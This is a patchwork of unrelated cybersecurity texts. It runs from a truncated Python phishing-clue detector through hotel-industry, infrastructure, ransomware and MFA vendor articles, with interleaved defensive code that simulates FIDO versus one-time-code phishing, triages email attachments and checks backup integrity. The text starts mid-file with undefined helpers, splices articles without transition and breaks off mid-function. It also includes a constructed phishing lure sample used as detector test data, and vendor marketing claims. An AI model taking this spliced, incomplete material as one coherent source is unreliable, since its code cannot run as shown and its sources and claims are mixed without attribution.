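def _edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (single-character insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str):
    """Trusted domain that `domain` imitates, or None if it is trusted or unrelated."""
    if domain in TRUSTED_DOMAINS:
        return None
    name = _normalize(domain).split(".")[0]  # registered name without the TLD
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        if _edit_distance(name, brand) <= 1 or brand in name:
            return trusted
    return None


def phishing_clues(raw: bytes) -> list:
    """Return human-readable clues that a raw RFC 5322 message may be phishing."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_header = str(msg.get("From", ""))
    display_name = parseaddr(from_header)[0].lower()
    from_domain = _domain(from_header)
    clues = []

    imitated = lookalike_of(from_domain)
    if imitated:
        clues.append(f"sender domain {from_domain} looks like {imitated}")
    for trusted in TRUSTED_DOMAINS:  # display name borrows a brand the address lacks
        brand = trusted.split(".")[0]
        if brand in display_name and from_domain != trusted:
            clues.append(f"display name claims '{brand}' but address is @{from_domain}")
            break
    reply_to = msg.get("Reply-To")
    if reply_to and _domain(str(reply_to)) != from_domain:
        clues.append(f"Reply-To domain {_domain(str(reply_to))} differs from From domain")
    subject = str(msg.get("Subject", "")).lower()
    hits = [w for w in URGENCY_WORDS if w in subject]
    if hits:
        clues.append("urgency language in subject: " + ", ".join(hits))
    for part in msg.iter_attachments():
        filename = (part.get_filename() or "").lower()
        ext = filename[filename.rfind("."):] if "." in filename else ""
        if ext in RISKY_EXTENSIONS:
            clues.append(f"risky attachment type: {filename}")
    return clues


def build_sample(from_header, subject, reply_to=None, attachment_name=None) -> bytes:
    """Construct a sample message (test data for this example, not a real capture)."""
    msg = EmailMessage()
    msg["From"] = from_header
    msg["To"] = "reservations@example-hotel.com"
    msg["Subject"] = subject
    if reply_to:
        msg["Reply-To"] = reply_to
    msg.set_content("Please review the attached reservation details.")
    if attachment_name:
        msg.add_attachment(b"placeholder bytes", maintype="application",
                           subtype="octet-stream", filename=attachment_name)
    return msg.as_bytes()


# Constructed samples: one built from a typical reservation-lure template, one benign.
PHISH_SAMPLE = build_sample('"Booking.com Reservations" <noreply@bo0king-confirm.net>',
                            "URGENT: confirm guest reservation within 24 hours",
                            reply_to="desk@mail-relay.example",
                            attachment_name="Reservation_Details.docm")
LEGIT_SAMPLE = build_sample('"Booking.com" <noreply@booking.com>',
                            "Reservation confirmation 48213",
                            attachment_name="Reservation_48213.pdf")

if __name__ == "__main__":
    for label, sample in (("phishing", PHISH_SAMPLE), ("legitimate", LEGIT_SAMPLE)):
        print(label, phishing_clues(sample) or ["no clues"])
```

The clues are heuristics and will produce false positives (a legitimate partner with a hyphenated brand domain, for instance), so the output is a prompt for a human to verify out-of-band, not a block decision; the allowlist and word lists are the knobs to tune per property. The same samples double as training material: staff can be shown the flagged message and asked to spot each clue themselves.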

Ransomware. Hotels are prime targets for ransomware attacks, and many have outdated security for point-of-sale systems. Small chains have been slow to beef up security measures, reasoning that they are not on the radar — a misconception. The industry is stepping up security and education to combat this growing problem.

Point-of-sale and payment card attacks. These attacks pose the biggest threat to the hospitality industry as a whole. Many are directed against vendors, who present an opportunistic weak link. Causes range from easy-to-hack passwords and insecure remote access to dated software and improper configuration.

Denial of service (DoS) attack. Typically, hackers flood systems with so much bogus traffic that servers become overwhelmed and can't operate.

DarkHotel hacking. DarkHotel[5] is a cybercrime group that targets high-value individuals — a practice called spearphishing — often through hotel Wi-Fi. Common targets include hotel guests who are CEOs and other top-level company executives. Once cybercriminals gain access, they can spy and steal confidential information.

Customer data and identity theft. One of the biggest risks to hotel security and reputation is the hacking of customer credit card data. As such, network security upgrades and employee training are essential.

Critical steps hotels need to take to improve cybersecurity

Taking a proactive approach to cyber risk is critical for organizations of all sizes. Partnering with a specialist in cyber risk can help you secure coverage, while also strengthening your organization's digital armor. Here are some important areas of focus:

  • Employee training
  • Email hygiene
  • Multi-factor authentication (MFA) and virtual private networks (VPN)
  • Patch management
  • Access controls
  • Detection and duplication
  • Breach response planning

For more detailed information on this list, see our Cyber Security Controls Checklist. This report reviews the most important questions cyber insurance underwriters are asking and provides remediation advice you can put into practice to position your organization in the most positive light when requesting cyber coverage.

A consultation with Gallagher could reveal new methods to manage your risk to cyber events. Risk transfer is only a piece of the puzzle, and our holistic approach could better prepare you for an inevitable cyber attack. Contact us to discuss your coverage gaps and cybersecurity posture, and why it's important to engage with cyber insurance today.

Author Information

Max Pragnell

Senior account executive, broker at iibre.

John Farley

Managing director — cyber liability practice. New York, NY.

[1] CyberWire podcast segment with Mathieu Gorge, CEO of VigiTrust, CyberWire, 15 Sept 2022. Transcript.

[2] "Cost of a Data Breach Report 2022," IBM Corporation, Jul 2022. PDF file.

[3] Paganini, Pierluigi. "TA558 Cybercrime Group Targets Hospitality and Travel Orgs," Security Affairs, 20 Aug 2022.

[4] Kelleher, Suzanne Rowan. "Data Breach Takes Down IHG Hotel Group Booking System, Impacting Holiday Inn, Kimpton and More," Forbes, 7 Sept 2022.

[5] "DarkHotel APT: What It Is and How It Works," Kaspersky, accessed 30 Sept 2022.


Report: Attacks Surge With Critical Infrastructure Under Siege

Between January 2023 and January 2024, global critical infrastructure sustained 13 attacks per second.


KnowBe4, a leading provider of security awareness training and simulated phishing, recently released its latest report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon. The report examines the growing threat of cyberattacks on critical infrastructure and provides insight into safeguarding against these potentially devastating attacks. 


In recent years, cyberattacks targeting critical infrastructure have surged globally, posing significant risks to national security and economic stability. Unlike other data breaches, these attacks primarily seek to access control systems for the purpose of disruption or espionage. Energy, transportation, and telecommunications sectors have become primary targets.

This is not surprising, as these sectors, especially in developed countries, have become increasingly dependent on interconnected digital technologies, which in turn have opened new vulnerabilities to cyberattacks. The consequences of these attacks are potentially devastating, and geopolitical adversaries have therefore made them a powerful addition to their arsenal of digital weapons.

Key findings from the report include:

  • The number of vulnerable points in U.S. power grids is growing by approximately 60 per day, with the total count rising from 21,000 in 2022 to between 23,000 and 24,000 today.
  • Globally, the average number of weekly cyberattacks against utilities has quadrupled since 2020, with a doubling occurring in 2023 alone.
  • Between January 2023 and January 2024, critical infrastructure worldwide sustained over 420 million attacks – equivalent to 13 attacks per second – marking a 30 percent increase from 2022.  

According to KnowBe4’s 2024 Phishing by Industry Benchmarking Report, critical infrastructure sectors such as healthcare and pharmaceutical, education, and energy and utilities fall into the high-risk categories for employees falling victim to phishing tactics. Cybercriminals exploit this vulnerability to infiltrate networks and systems.

“The findings in our report are a wake-up call for critical infrastructure sectors,” says Stu Sjouwerman, CEO at KnowBe4. “While the surge in cyberattacks on them is deeply concerning, it's important to remember that we're not powerless in this fight. By fostering a strong security culture that combines technology, processes, and people, we can significantly mitigate these risks. Every organization, regardless of size or sector, has a role to play in safeguarding our collective infrastructure. It's time we view cybersecurity not as just an IT issue, but as a fundamental aspect of our operational resilience and national security.”

The report highlights recent high-profile attacks on global critical infrastructure and their far-reaching impacts, and provides actionable recommendations for organizations and institutions to enhance their cyber resilience.

To download a copy of KnowBe4’s report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon, click here.


Cyber threats that shaped the first half of 2024

Global cybercrime has shown no sign of decline and is expected to keep growing strongly each year over the next five years. To identify the most urgent cybersecurity threats of the first half of 2024, the Critical Start Cyber Research Unit (CRU) analyzed 3,438 high and critical alerts generated by 20 supported EDR solutions, as well as 4,602 reports detailing ransomware and database leak activities across 24 industries in 126 countries.

Cyber Threat Intelligence Report

The first half of 2024 saw a worrying trend in cyberattacks targeting specific industries. Key report findings include:

  • Manufacturing and Industrial Products remained the industry most targeted by cyber threat actors in H1 2024, with 377 confirmed reports of ransomware and database leak hits in the first half of the year.
  • Professional Services saw an increase in reported database leaks and ransomware attacks, up 15% on 2023 (351 cases reported vs. 334). Legal services organizations, including courthouses, and supply chains have become prime targets because of the wealth of intellectual property and sensitive data they hold.
  • Healthcare & Life Sciences: ransomware and database leak incidents surged by 180% in February 2024 compared with the same period in 2023, coinciding with the attack on Change Healthcare and other healthcare providers.
  • Engineering and Construction remained a consistent target in the first half of both 2023 and 2024, with the United States bearing the brunt in the first half of 2024, a staggering 46.15% increase compared with 2023.
  • Technology: researchers found a 12.75% decrease (from H1 2023) in database leaks and ransomware attacks targeting technology companies.

“The first half of 2024 has painted a concerning picture of the ransomware threat landscape. We are continuing to observe a surge in ransomware and database leak activities,” said Callie Guenther, Senior Manager of Cyber Threat Research at Critical Start. “With bad actors becoming more sophisticated, it is vital for organizations to have a strong security culture and strategy in place. MDR solutions that integrate asset inventory, endpoint controls security coverage, and MITRE ATT&CK mitigations, help organizations proactively mitigate risk, leading to a reduced attack surface and a more resilient security infrastructure.”

The report also highlights trending concerns for businesses, including:

  • BEC attacks: Previously focused on large corporations, BEC scammers are now targeting smaller, less cybersecurity-conscious businesses.
  • Deepfakes and social engineering: Findings show a surge in deepfake attacks, with an exponential 3,000% increase in deepfake fraud attempts.
  • Abuse of open-source repositories: Attackers are increasingly using these repositories to launch two main types of attacks: repo confusion attacks and supply chain attacks.


Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate the ransomware threat: installing updates as soon as they are released, requiring phishing-resistant MFA (i.e., not SMS text-message codes), and training users.

The growth in the number of victims of ransomware attacks and data breaches has become so profound that the new cyber defense challenge is just keeping up with the number of new attacks and disclosures from victims. This is the product of stunning advancements in cybercriminal attack methods combined with a too-slow response by many organizations in adjusting to new attack methods. As predicted, Generative AI has indeed been a game changer for cybercriminals attacking organizations and it mandates urgent adjustments to cyber defense strategies.

Through this remarkable transformation in threats, one thing that hasn't changed is the inherent human limitations of everyday users, which is why they are the preferred target for cybercriminals. No amount of training will ever imbue the average user with the super-skills required to detect advanced phishing campaigns or sophisticated deepfakes.

To understand the impact, Token set out to collect perspectives on this pressing subject from cybersecurity leaders in their own words. To accomplish this, Token commissioned Datos Insights, a leading global data and advisory services firm, for a research study that reveals the insights and perspectives of leading CISOs and workforce MFA leaders across the U.S. Datos Insights ditched the overused multiple-choice questionnaire approach and conducted qualitative 60-minute video interviews to examine CISO perspectives in depth. In this article, we will examine the valuable insights gained from the research.

CISOs are unanimous that user vulnerabilities are their number one risk

Attack vectors are advancing in sophistication through the adoption of artificial intelligence capabilities, specifically generative AI, making them more difficult for CISOs and their teams to defend against. Cybercriminals most frequently target employees at large organizations through phishing attacks to gain network access. CISA reports that 90% of ransomware attacks are the result of phishing.


Increase your organization's security with insights from industry leaders. Download the "CISO Perspectives on Multifactor Authentication" report to uncover how top CISOs are navigating the evolving landscape of identity and access management, and learn how you can implement cutting-edge MFA strategies to protect your workforce and fortify your defenses against emerging threats.

Advanced Phishing Attacks remain the most effective tool in a hacker's arsenal. These attacks have become more targeted and sophisticated with the use of Gen AI. Gen AI also enables the launching of spear phishing attacks targeted at specific individuals within an organization on a large scale and with greater detail, leveraging real data about the organization and its employees to appear authentic. The tell-tale signs of phishing emails are rapidly disappearing as these emails are increasingly indistinguishable from legitimate communications. This will soon negate the value of user training.

The above is further compounded by the rise of Deepfake technology as Gen AI has given birth to new forms of social engineering attacks. Cybercriminals are now using AI-generated voices and videos to impersonate executives and other trusted individuals. These are being executed via phone calls from trusted phone numbers that are spoofed by the attackers and via Zoom conference calls where cybercriminals impersonate known and trusted colleagues. Attackers have been successful in convincing employees to transfer funds, share credentials, and perform other actions that can compromise security. These attacks exploit the inherent trust that employees place in familiar voices and faces, making them exceptionally dangerous.

The tools to conduct these attacks are now available to billions on the dark web with no specialized skills required. Phishing and ransomware attacks were once the exclusive realm of expert cybercriminals, but with the advent of generative AI and new cybercrime tools, launching these attacks has become accessible to anyone with access to the dark web, which is anyone with a computing device and an internet connection. Ransomware-as-a-Service (RaaS) and AI-driven tools available on the dark web have simplified the process, eliminating the need for advanced skills. This shift enables individuals with minimal technical knowledge to execute sophisticated cyberattacks with just a computer and internet connection. The gig economy meets the next generation of cyber attacks.

New attacks require new defense strategies

Phishing-Resistant MFA Adoption is critical and no longer a nice-to-have. With phishing the top cyber threat for enterprises, legacy MFA is proving increasingly inadequate, as the victim counts show. Many legacy MFA solutions are decades-old technology. The current report highlights the urgency of deploying phishing-resistant, next-generation MFA solutions, especially in the face of AI-enhanced phishing attacks. CISOs should accelerate the shift toward MFA solutions that are hardware-based, use biometrics, and are FIDO-compliant. These significantly mitigate phishing and ransomware attacks and would have prevented the overwhelming majority of current ransomware attacks, saving organizations billions of dollars combined in the last year alone.
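The advisory and the paragraph above contrast SMS codes with phishing-resistant, FIDO-style MFA without spelling out what makes the latter survive a relayed login page. The simulation below is an added example and is not Token's product, the Datos Insights study, or any real WebAuthn library: the browser, authenticator and relying party are constructed stand-ins, and an HMAC under a per-credential key stands in for the public-key signature a real FIDO authenticator produces (the property shown does not depend on the primitive). It runs the same relayed sign-in against a one-time code and against an origin-bound assertion, and shows why only the former is accepted: the user agent writes the page origin into the data that gets signed, and the credential is scoped to the relying-party ID, so a lookalike origin has neither a usable credential nor a signature the real site will accept.

```python
import hashlib
import hmac
import json
import secrets


def _host(origin: str) -> str:
    """Simplification for the example: the relying-party ID is the origin's host."""
    return origin[len("https://"):] if origin.startswith("https://") else origin


class Authenticator:
    """Constructed stand-in for a roaming authenticator: one credential per rpId."""

    def __init__(self):
        self._credentials = {}  # rp_id -> (credential_id, key)

    def register(self, rp_id: str):
        credential_id, key = secrets.token_hex(8), secrets.token_bytes(32)
        self._credentials[rp_id] = (credential_id, key)
        return credential_id, key  # a real authenticator hands the RP a public key instead

    def sign_assertion(self, rp_id: str, client_data: bytes):
        # Credential scoping: a lookalike site has a different rpId, so nothing exists for it.
        if rp_id not in self._credentials:
            raise LookupError(f"no credential registered for {rp_id}")
        credential_id, key = self._credentials[rp_id]
        sig = hmac.new(key, hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
        return credential_id, sig


def browser_get_assertion(page_origin: str, authenticator: Authenticator, challenge: str) -> dict:
    """The user agent, not the page's script, records the origin in the signed client data."""
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    credential_id, sig = authenticator.sign_assertion(_host(page_origin), client_data)
    return {"client_data": client_data, "credential_id": credential_id, "sig": sig}


class RelyingParty:
    """Constructed stand-in for the site being signed in to."""

    def __init__(self, origin: str):
        self.origin, self.rp_id = origin, _host(origin)
        self._users, self._challenges = {}, set()

    def enroll(self, user: str, authenticator: Authenticator):
        self._users[user] = authenticator.register(self.rp_id)

    def challenge(self) -> str:
        c = secrets.token_urlsafe(32)
        self._challenges.add(c)
        return c

    def verify(self, user: str, assertion: dict) -> bool:
        credential_id, key = self._users[user]
        data = json.loads(assertion["client_data"])
        if data.get("type") != "webauthn.get" or data.get("origin") != self.origin:
            return False  # the signed origin is not ours: assertion came from another page
        if data.get("challenge") not in self._challenges:
            return False  # unknown or already-used challenge
        self._challenges.discard(data["challenge"])  # challenges are single-use
        if assertion["credential_id"] != credential_id:
            return False
        expected = hmac.new(key, hashlib.sha256(assertion["client_data"]).digest(),
                            hashlib.sha256).digest()
        return hmac.compare_digest(expected, assertion["sig"])


def otp_code(secret: bytes, counter: int) -> str:
    """Simplified HOTP-style code: bound to a secret and counter, but to no origin."""
    digest = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    return f"{int.from_bytes(digest[-4:], 'big') % 1_000_000:06d}"


def simulate() -> dict:
    rp = RelyingParty("https://login.example-bank.com")
    authenticator = Authenticator()
    rp.enroll("alice", authenticator)

    # 1. Legitimate sign-in: the browser is on the real origin.
    legit = rp.verify("alice", browser_get_assertion(rp.origin, authenticator, rp.challenge()))

    # 2. Relayed sign-in: a lookalike page forwards a real challenge to the user. The browser
    #    binds the lookalike origin, and the authenticator holds no credential for that rpId.
    lookalike_origin = "https://login.example-bank-secure.com"
    try:
        assertion = browser_get_assertion(lookalike_origin, authenticator, rp.challenge())
        phished_fido = rp.verify("alice", assertion)
    except LookupError:
        phished_fido = False

    # 3. The same relay against a one-time code: the code the user reads off their device and
    #    types into the lookalike page is exactly what the real site expects.
    otp_secret, counter = secrets.token_bytes(20), 7
    code_typed_on_lookalike = otp_code(otp_secret, counter)
    phished_otp = code_typed_on_lookalike == otp_code(otp_secret, counter)

    return {"legit_fido": legit, "phished_fido": phished_fido, "phished_otp": phished_otp}


if __name__ == "__main__":
    print(simulate())
```

Two defender-side checks fall out of the relying-party code: reject any assertion whose signed origin is not the expected origin, and treat every challenge as single-use. Both should show up in the authentication logs as distinct failure reasons, since a burst of origin-mismatch failures for one user is itself a signal that a relay page is in circulation.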

Next-generation MFA is best implemented with targeted deployments for privileged users. The report emphasizes prioritizing the deployment of next-generation MFA to high-risk users within the enterprise, particularly systems administrators and executives. CISOs need to improve risk management for system administrators even where privileged access management (PAM) solutions are in place. "PAM solutions have functioned as the historical norm for CISOs managing system admin risks." The rise of phishing and insider attacks means CISOs should prioritize MFA upgrades for this important business risk. The report found that senior executives at many firms lack robust security solutions aligned with their business functions and business risk. Almost none of the CISOs interviewed had distinct controls deployed for their executive users. With spear-phishing and other techniques on the rise, this gap was unexpected and troubling.

The techniques used by cybercriminals are constantly evolving, but never so rapidly as over the past twelve months. We have surpassed the capacity of our users to be our first line of cyber defense and we have not given them any new tools beyond those developed years or decades ago. By staying informed about the latest threats and implementing a multi-layered defense strategy that emphasizes upgrading to phishing-resistant, next-generation MFA, organizations can protect their users' identities and stop cybercriminals from gaining unauthorized access to data and sensitive operations. Protecting your users from new attacks requires vigilance, education, and the right tools. By prioritizing these areas, organizations can significantly reduce the risk of a successful cyberattack and maintain the trust of their customers and stakeholders.

Learn more about how Token's Next-Generation MFA can stop phishing and ransomware from harming your organization at tokenring.com

Ransomware attacks continue to increase in the US, UK, and Canada


The Gen Threat Report, formerly known as the Avast Threat Report, has revealed a 100% increase in ransomware activity for the US, UK, and Canada; 66% in Australia; and a whopping 379% in India.

Ransomware is one of the most dangerous and fast-growing threats in the digital world today. It’s a type of malware that can lock you out of your files or entire system until you pay a ransom, usually in cryptocurrency.

Unfortunately, as detailed in the Gen Q2/2024 Threat Report, the threat of ransomware is not going away—in fact, it’s getting worse. Let’s take a closer look at what ransomware is, how it’s evolving, and what you can do to protect yourself.

What is ransomware?  

Ransomware is a form of malicious software that, once it infects your device, encrypts your files or locks you out of your system entirely. The attackers then demand a ransom, often in Bitcoin or another cryptocurrency, in exchange for a decryption key that will supposedly restore your access.

These attacks can be devastating. Imagine losing access to your family photos, important work documents, private information, or your entire digital life in an instant. That’s the reality of a ransomware attack—and paying the ransom doesn’t guarantee you’ll get your data back. In many cases, victims who pay the ransom never receive the promised decryption key.

The rise of ransomware in 2024  

Ransomware attacks are on the rise, with a notable 24% increase in the second quarter of 2024 alone. The sharpest spikes were seen in the United States, United Kingdom, Canada, and India. However, no country is safe from this growing threat. Recently, ransomware attacks have become more sophisticated, targeting both individuals and businesses with increased precision.

One reason for this increase is the evolution of ransomware tactics. Cybercriminals are constantly refining their methods to maximize their impact. For example, some attackers now not only encrypt your files but also threaten to release sensitive data publicly if you don’t pay up multiple times. This double-extortion tactic puts even more pressure on victims to comply with their demands.

Real-world examples of ransomware from 2024  

One of the most prevalent strains was LockBit, a ransomware family that has been wreaking havoc across the globe. Interestingly, after the identity of one of its key developers was revealed, the number of LockBit attacks surged, possibly as an act of retaliation or desperation.

Another concerning development was the rise of Twizt, a botnet that shifted its focus to spreading LockBit ransomware through malicious email attachments. This change in tactics shows how flexible and adaptive these cybercriminals can be, always looking for new ways to infiltrate systems and extort money.

Despite the alarming rise in ransomware attacks, there were also some victories. Law enforcement agencies around the world have been actively working to disrupt these criminal operations. In Q2/2024, several high-profile botnet providers were taken down, leading to arrests and the seizure of infrastructure.

Additionally, cybersecurity companies have continued to develop free decryption tools, like the one released for the DoNex ransomware. Created by our own team of experts, this tool may give the victims a chance to recover their files without paying a ransom.

How ransomware spreads

Ransomware can infect your device in several ways, not so different from other types of malware. Here are a few of the most common methods:

  • Phishing emails: Many ransomware attacks begin with a phishing email that contains a malicious attachment or link. When you open the attachment or click the link, the ransomware is downloaded and installed on your device.
  • Malicious websites: Sometimes, visiting a compromised or fake website is enough to get infected. These sites might exploit vulnerabilities in your browser or prompt you to download an infected file.
  • Drive-by downloads: In some cases, simply visiting a website can trigger a download of the ransomware without any interaction on your part. This can happen if the website is compromised and has malicious scripts embedded in its code.
  • Infected software or apps: Downloading software or apps from untrusted sources can also lead to a ransomware infection. Always make sure you’re downloading from reputable sites or official app stores.
  • Exploited vulnerabilities: Cybercriminals can exploit security flaws in your operating system or software to install ransomware. This is why keeping your software up to date is so critical.
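The phishing vector above is the one a defender can screen for before a user ever opens anything. The following is an added example, not code from Avast or from this article: a small attachment-triage rule set of the kind a mail gateway or SOC script might apply, checking for executable file types, macro-enabled Office documents, double extensions such as invoice.pdf.exe, runnable files inside archives, and a declared Content-Type that contradicts the filename. The sender list, the message samples and the verdict names (deliver, flag, quarantine, block) are all constructed for illustration.

```python
"""Attachment triage for phishing-borne ransomware.

Added example (not Avast's code): a rule set a mail gateway or SOC script
could apply to attachment metadata before a user opens anything. The
message objects below are constructed samples, not real mail.
"""
from dataclasses import dataclass, field

# File types that run code when opened on a typical desktop.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "ps1",
                   "vbs", "js", "jse", "wsf", "hta", "lnk", "msi"}
# Office formats that can carry macros (plain .docx/.xlsx cannot).
MACRO_EXTS = {"docm", "xlsm", "pptm", "dotm"}
# Containers commonly used to get the above past simple filters.
CONTAINER_EXTS = {"zip", "rar", "7z", "iso", "img"}
# What a user expects a "document" attachment to be.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


@dataclass
class Attachment:
    filename: str
    declared_mime: str = "application/octet-stream"
    inner_names: list = field(default_factory=list)  # listing, if an archive


def extensions(filename):
    """All extension parts, lower-cased: 'invoice.pdf.exe' -> ['pdf', 'exe']."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    return parts[1:] if len(parts) > 1 else []


def triage_attachment(att):
    """Return the reasons (possibly none) this attachment should be held."""
    reasons = []
    exts = extensions(att.filename)
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        reasons.append(f"executable attachment (.{last})")
    if last in MACRO_EXTS:
        reasons.append(f"macro-enabled Office document (.{last})")
    # 'invoice.pdf.exe' is shown as 'invoice.pdf' when extensions are hidden.
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS | MACRO_EXTS:
        reasons.append("double extension disguising code as a document")
    if last in CONTAINER_EXTS:
        for inner in att.inner_names:
            inner_ext = (extensions(inner) or [""])[-1]
            if inner_ext in EXECUTABLE_EXTS | MACRO_EXTS:
                reasons.append(f"archive contains runnable file {inner}")
    # Declared type and extension disagree: something is being misrepresented.
    if att.declared_mime == "application/pdf" and last != "pdf":
        reasons.append("Content-Type says PDF but filename does not")
    return reasons


def triage_message(sender, subject, attachments, known_senders):
    """Classify a message as 'deliver', 'flag', 'quarantine' or 'block'.

    A disguised executable or code inside an archive blocks outright; any
    other attachment finding quarantines; an attachment from a sender not
    on the known list is only flagged for the user's attention.
    """
    findings = []
    for att in attachments:
        findings.extend((att.filename, r) for r in triage_attachment(att))
    if attachments and sender.lower() not in known_senders:
        findings.append((sender, "attachment from unknown sender"))
    attachment_reasons = [r for _, r in findings if r != "attachment from unknown sender"]
    if any(r.startswith(("double extension", "archive contains")) for r in attachment_reasons):
        verdict = "block"
    elif attachment_reasons:
        verdict = "quarantine"
    elif findings:
        verdict = "flag"
    else:
        verdict = "deliver"
    return verdict, findings


# Constructed samples: a hypothetical allow-list and five hypothetical messages.
KNOWN_SENDERS = {"payroll@example.com"}
SAMPLE_MESSAGES = [
    ("payroll@example.com", "April payslip", [Attachment("payslip.pdf", "application/pdf")]),
    ("billing@example.net", "Overdue invoice", [Attachment("invoice.pdf.exe", "application/pdf")]),
    ("hr@example.org", "Updated policy", [Attachment("policy.docm")]),
    ("courier@example.net", "Delivery notice",
     [Attachment("notice.zip", inner_names=["notice.pdf", "notice.js"])]),
    ("friend@example.net", "photos", [Attachment("beach.jpg", "image/jpeg")]),
]


def run_demo():
    """Return {subject: verdict} for the constructed sample messages."""
    return {subject: triage_message(sender, subject, atts, KNOWN_SENDERS)[0]
            for sender, subject, atts in SAMPLE_MESSAGES}


if __name__ == "__main__":
    for subject, verdict in run_demo().items():
        print(f"{verdict:10} {subject}")
```

The rules deliberately operate on metadata only (names, declared types, archive listings), so they run before any content is parsed; they complement, rather than replace, the antivirus scanning the article recommends.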

7 tips to help protect you against ransomware

While ransomware is a serious threat, there are actions you can take to help protect yourself. Here are 7 things you can do:

  • Back up your data regularly. The best defense against ransomware is having up-to-date backups of your important files. Make sure these backups are stored offline or in a secure cloud service. If you’re hit by ransomware, you can restore your files without paying the ransom.
  • Be cautious with email attachments and links. Be wary of unsolicited emails, especially those with attachments or links. Even if an email looks like it’s from a trusted source, verify its legitimacy before opening anything.
  • Keep your software updated. Regularly updating your operating system, antivirus, and other software is crucial. These updates usually include security patches that protect against known vulnerabilities.
  • Use strong, unique passwords. Ensure that your accounts are protected with strong, unique passwords. Consider using a password manager to help you keep track of them. Enable two-factor authentication (2FA) wherever possible.
  • Install reliable security software. A robust antivirus can help detect and block ransomware before it can do any harm. Make sure your security software is always up to date.
  • Avoid untrusted websites and downloads. Be cautious when downloading files or software, especially from unfamiliar websites. Stick to reputable sources to reduce your risk of infection.
  • Keep yourself informed. Awareness is key. Make sure you and your loved ones understand the risks of ransomware and how to avoid it. Knowing what to look for can help prevent an attack before it happens.

What to do if you’re targeted by a ransomware attack

No one wants to go through a ransomware ordeal, but it can happen to anyone. If it does happen, here’s what you should do:

  • Disconnect from the internet. Immediately disconnect your device from the network to prevent the ransomware from spreading to other devices on your network.
  • Don’t pay the ransom. Paying the ransom doesn’t guarantee you’ll get your data back. It also encourages these criminals to continue their activities. Instead, restore the data from your backup or look for decryption tools that might help you recover your files.
  • Contact a professional. Reach out to a cybersecurity expert or a reputable IT professional who can help assess the situation and determine the best course of action.
  • Report the incident. Report the ransomware attack to local law enforcement and any relevant authorities, such as the FBI in the US or the National Cyber Security Centre in the UK. This can help in tracking down the attackers and preventing future incidents.
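The first tip above (keep offline backups) and the second response step (restore from backup rather than pay) both rest on one thing the article does not spell out: you must be able to tell that a backup is still intact before you restore from it. The following is an added example, not code from Avast or from this article, showing one way to do that. It writes a SHA-256 manifest of a backup tree to a separate location, verifies the tree against that manifest later, and additionally flags changed or new files whose content has become high-entropy, which is a common (though not definitive) sign that a file has been encrypted. The directory layout, the file names, the entropy threshold and the list of legitimately compressed extensions are all assumptions made for the demo; the sample tree is constructed in a temporary directory and the tampering in `demo()` is a test fixture that overwrites one file with random bytes and renames another.

```python
"""Backup manifest and integrity check.

Added example (not Avast's code): build a SHA-256 manifest of a backup
tree, store it away from the tree, and verify the tree against it before
trusting a restore. Files whose content has turned high-entropy are
reported separately. All paths and files below are constructed.
"""
import hashlib
import json
import math
import os
import tempfile
from collections import Counter

# Formats that are legitimately high-entropy; not reported as encrypted.
COMPRESSED_EXTS = {".zip", ".gz", ".7z", ".jpg", ".jpeg", ".png", ".mp4", ".pdf"}
ENTROPY_THRESHOLD = 7.2  # bits/byte; plain text is ~4-5, random data ~8 (assumed cut-off)


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks so large backups fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_manifest(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as f:
        json.dump(manifest, f, indent=2, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def verify_manifest(root, manifest):
    """Compare the tree against a stored manifest.

    Returns changed, missing and new files, the subset of changed/new files
    whose content now looks encrypted, and an overall ok flag.
    """
    current = build_manifest(root)
    changed = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in current)
    new = sorted(p for p in current if p not in manifest)
    suspicious = []
    for rel in changed + new:
        if os.path.splitext(rel)[1].lower() in COMPRESSED_EXTS:
            continue
        with open(os.path.join(root, rel), "rb") as f:
            sample = f.read(1 << 20)  # the first MiB is enough to judge entropy
        # Very short files give unreliable entropy figures, so skip them.
        if len(sample) >= 256 and shannon_entropy(sample) > ENTROPY_THRESHOLD:
            suspicious.append(rel)
    return {"changed": changed, "missing": missing, "new": new,
            "suspicious": sorted(suspicious),
            "ok": not (changed or missing or new)}


def demo():
    """Snapshot a constructed backup tree, tamper with it, re-verify.

    Returns (result_before_tampering, result_after_tampering).
    """
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as vault:
        docs = os.path.join(root, "docs")
        os.makedirs(docs)
        with open(os.path.join(docs, "notes.txt"), "w") as f:
            f.write("quarterly figures, to be reviewed\n" * 50)
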